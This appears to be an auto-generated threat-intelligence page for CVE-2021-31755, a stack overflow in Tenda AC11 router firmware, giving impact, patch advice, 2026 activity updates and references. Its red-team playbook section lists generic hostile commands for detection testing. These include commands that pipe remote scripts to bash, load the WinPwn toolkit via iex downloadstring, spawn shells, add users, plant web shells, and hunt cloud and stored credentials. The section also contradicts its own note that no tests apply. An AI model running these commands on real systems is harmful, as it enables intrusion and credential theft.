CVE-2021-31755
Overview
This vulnerability is a stack-based buffer overflow occurring in the firmware of specific Tenda AC11 devices. The root cause lies in improper bounds checking within the /goform/setmac endpoint, where user-supplied input is copied into a fixed-size stack buffer without adequate validation. This flaw affects the device's HTTP server component responsible for handling MAC address configuration requests.
Vulnerability Description
An issue was discovered on Tenda AC11 devices with firmware through 02.03.01.104_CN. A stack buffer overflow vulnerability in /goform/setmac allows attackers to execute arbitrary code on the system via a crafted post request.
Impact
An unauthenticated attacker can exploit this vulnerability remotely by sending a specially crafted POST request to the affected endpoint, resulting in arbitrary code execution on the device. This grants the attacker full control over the router, enabling unauthorized access, data exfiltration, and persistent compromise of the network infrastructure. The flaw allows attackers to bypass all authentication mechanisms and gain administrative privileges, potentially disrupting network operations and compromising connected devices.
Solution
Users should upgrade Tenda AC11 firmware to versions later than 02.03.01.104_CN as provided by the vendor. Detailed patch instructions and firmware updates are available through Tenda's official support channels and the referenced GitHub repository containing exploit mitigation information. Applying the latest firmware eliminates the vulnerable code path in the /goform/setmac handler and mitigates the buffer overflow risk.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The stack buffer overflow vulnerability identified in Tenda AC11 devices presents a significant risk to the integrity and security of affected systems. This flaw arises from improper handling of input data in the /goform/setmac function, which processes MAC address settings. When a crafted POST request is sent to the device, it can overflow the buffer allocated for input, allowing attackers to overwrite adjacent memory. This can lead to arbitrary code execution, enabling an attacker to gain control over the device, alter its configuration, or deploy malicious payloads. The severity of this vulnerability is underscored by its high CVSS score of 9.8, indicating critical risk.
Exploitation of this vulnerability can occur through various attack vectors. An attacker could leverage remote access to the device, potentially targeting users on the same network or exploiting unsecured internet-facing interfaces. For instance, a malicious actor could craft a specially formatted request that exceeds the buffer size, leading to code execution. This could be executed by sending the crafted request via a simple HTTP POST method, making it accessible to individuals with minimal technical expertise. Furthermore, the lack of authentication mechanisms in the affected firmware exacerbates the risk, as attackers do not need to bypass any security controls to exploit the vulnerability.
The real-world impact of this vulnerability can be profound, particularly for businesses relying on Tenda AC11 devices for network connectivity. Successful exploitation could lead to unauthorized access to sensitive data, disruption of network services, or even the establishment of a foothold for further attacks within an organization’s infrastructure. The potential for data breaches and the subsequent financial and reputational damage cannot be overstated. Organizations may face regulatory scrutiny, loss of customer trust, and significant recovery costs, all of which contribute to a heightened business risk profile.
To effectively detect and mitigate the risks associated with this vulnerability, organizations should implement a multi-layered security strategy. Regularly updating firmware to the latest versions is crucial, as manufacturers often release patches to address known vulnerabilities. Additionally, network segmentation can help isolate vulnerable devices from critical systems, reducing the potential impact of an exploit. Intrusion detection systems (IDS) can be employed to monitor for unusual traffic patterns or unauthorized access attempts, providing an additional layer of defense. Organizations should also conduct regular security assessments and penetration testing to identify and remediate vulnerabilities proactively.
In conclusion, the stack buffer overflow vulnerability in Tenda AC11 devices poses a serious threat to network security. Its ease of exploitation and potential for significant impact necessitate immediate attention from organizations utilizing these devices. By adopting robust detection and mitigation strategies, businesses can better protect themselves against the risks associated with this vulnerability, ensuring the integrity and security of their networks.
CSURFACE threat intelligence has detected a marked escalation in activity related to CVE-2021-31755, with new indications of exploitation attempts emerging after a period of dormancy. While no novel exploit techniques or ransomware affiliations have been identified, the resurgence of targeting against Tenda AC11 devices underscores a renewed adversary interest. This uptick in telemetry suggests that threat actors may be actively probing for vulnerable systems or testing weaponization methods, increasing the likelihood of successful compromise. Consequently, the risk level associated with this vulnerability has shifted from theoretical to more imminent, warranting heightened vigilance in monitoring network traffic and device behavior for signs of exploitation.
Update 2 — June 07, 2026
CSURFACE threat intelligence has identified a marked escalation in activity targeting the CVE-2021-31755 vulnerability on Tenda AC11 routers. Our telemetry indicates that adversaries are increasingly engaging in reconnaissance and exploitation attempts, suggesting a shift from opportunistic scanning to more deliberate intrusion efforts. Although no new exploit variants or ransomware affiliations have been detected, the intensified probing heightens the probability of successful compromise, especially in environments where patching remains incomplete. This development elevates the threat posture from a latent risk to an active concern, underscoring the necessity for continuous monitoring of network traffic and device logs to detect anomalous behavior indicative of exploitation attempts.
Update 3 — June 16, 2026
CSURFACE threat intelligence has detected a modest uptick in activity targeting the CVE-2021-31755 vulnerability on Tenda AC11 devices, reflected by a slight increase in exploitation attempts observed across our sensors. Although the EPSS score has marginally declined, indicating a subtle reduction in predicted exploit probability, the increased detection frequency suggests adversaries are maintaining or slightly intensifying their focus on this vector. This divergence underscores the persistence of threat actors leveraging this critical stack buffer overflow, despite no new exploit variants or ransomware affiliations emerging. For defenders, this signals that the vulnerability remains an active attack surface with ongoing reconnaissance and exploitation attempts, particularly in environments where patch deployment is incomplete or delayed. Consequently, the threat level should be considered elevated from latent to actively targeted, warranting sustained vigilance in monitoring network and device behaviors to promptly identify and respond to exploitation indicators.
Update 4 — July 06, 2026
CSURFACE threat intelligence has identified a marked escalation in exploitation attempts targeting the CVE-2021-31755 vulnerability on Tenda AC11 devices. Our telemetry indicates that adversaries are increasingly leveraging this stack buffer overflow flaw, as evidenced by a significant uptick in detection activity across multiple monitored environments. Although no novel exploit variants or ransomware affiliations have surfaced, the sustained and growing exploitation attempts underscore that threat actors continue to prioritize this vulnerability as a viable attack vector. This heightened activity suggests that unpatched or inadequately secured devices remain at considerable risk, amplifying the urgency for defenders to maintain robust monitoring and incident response protocols. Consequently, the threat level associated with CVE-2021-31755 should be elevated from a latent concern to an actively exploited risk, reflecting the evolving adversary focus and persistent targeting observed in recent intelligence.
Affected Products (1)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Tenda | Ac11 Firmware | All |
cpe:2.3:o:tenda:ac11_firmware:*:*:*:*:*:*:*:*
|
Exploits
No exploits found for this CVE.
Threat Feed
21 eventsSighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
CISA confirmed active exploitation — added to Known Exploited Vulnerabilities catalog
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns
No CAPEC pattern mapped to this CVE.
Red Team Playbook
44 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (3)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2021-31755 |
| github.com |
GitHub CVE
x_refsource_MISC
|
https://github.com/Yu3H0/IoT_CVE/tree/main/Tenda/CVE_3 |
| cisa.gov |
NVD API
US Government Resource
|
https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2021-31755 |